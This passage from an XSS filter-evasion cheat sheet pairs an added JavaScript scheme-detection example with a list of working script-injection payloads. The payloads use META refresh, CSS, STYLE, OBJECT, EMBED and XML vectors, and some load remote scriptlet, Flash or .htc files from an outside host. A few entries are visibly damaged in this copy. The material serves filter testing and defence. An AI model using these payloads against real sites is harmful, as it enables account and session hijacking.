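Most of the IMG SRC variants on this page (tab, newline, carriage return or null byte inside "javascript", an HTML entity standing in for one of those, leading whitespace, mixed case, and the fully entity-encoded scheme) defeat a filter that greps for the literal string javascript: because the filter looks at the raw attribute while the browser looks at it after entity decoding and URL normalisation. The US-ASCII trick just above is the same idea one layer down: the filter sees ¼script¾ while a browser told the page is US-ASCII keeps only 7 bits of each byte. The block below is an added example, not code from the page: it performs the same decoding steps before checking the scheme, and masks bytes to 7 bits to show what the US-ASCII payload becomes. Null-byte removal models the old IE behaviour the list targets (current browsers do not strip it), so the check errs on the side of flagging. All inputs are constructed.

```javascript
'use strict';

// Step 1: attribute values are entity-decoded before the URL is parsed.
// Numeric references with or without the trailing semicolon, plus the few
// named ones that matter in a URL.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(?:#x([0-9a-f]+)|#(\d+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    const v = named[name.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// Step 2: the URL parser strips leading/trailing C0 controls and spaces,
// removes tab, LF and CR anywhere, and matches the scheme case-insensitively.
// NUL is removed too, to cover the legacy java\0script vector.
function urlScheme(raw) {
  const u = decodeEntities(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .replace(/[\t\n\r\u0000]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(u);
  return m ? m[1].toLowerCase() : null;
}

// The schemes from this list that execute script in some browser.
function isScriptUrl(raw) {
  const s = urlScheme(raw);
  return s === 'javascript' || s === 'vbscript' || s === 'livescript' || s === 'mocha';
}

// Step 3: the US-ASCII trick. With the page declared US-ASCII only the low 7
// bits of each byte count, so 0xBC (¼) reads as 0x3C (<), 0xBE (¾) as 0x3E (>)
// and 0xA2 (¢) as 0x22 ("). Input is the Latin-1 text as the filter saw it.
function sevenBitView(latin1) {
  return Array.from(latin1, ch => String.fromCharCode(ch.charCodeAt(0) & 0x7f)).join('');
}
```

A space inside the scheme (jav ascript:) is correctly not flagged: browsers do not tolerate it either, which is why the list uses tab, newline and carriage return rather than spaces.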
META protocol
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Code: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Code: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
Unicode-encoded DIV (CSS hex escapes; the backslash before each group was stripped in this copy)
Code: <DIV STYLE="background-image: 075 072 06C 028 06a 061 076 061 073 063 072 069 070 074 03a 061 06c 065 072 074 028.1027 058.1053 053 027 029 029">
Using the expression property (IE only)
Code: <DIV STYLE="width: expression(alert('XSS'));">
STYLE tag
Code: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Code: <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
Code: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
Code: <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
OBJECT tag
Code: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
Code: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
EMBED tag
Code: <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Code: <EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Inside the Flash file use the following code:
Code: a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
XML namespace: a behavior (.htc) file can be pulled in, but it must be on the same server
Code: <HTML xmlns:xss>
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
Xss.htc: <PUBLIC:COMPONENT TAGNAME="xss">
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/>
</PUBLIC:COMPONENT>
<SCRIPT>
function main()
{
alert("XSS");
}
</SCRIPT>
XML data island obfuscated with CDATA
Code: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
XML data island
Code: <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')
Black-Hole collection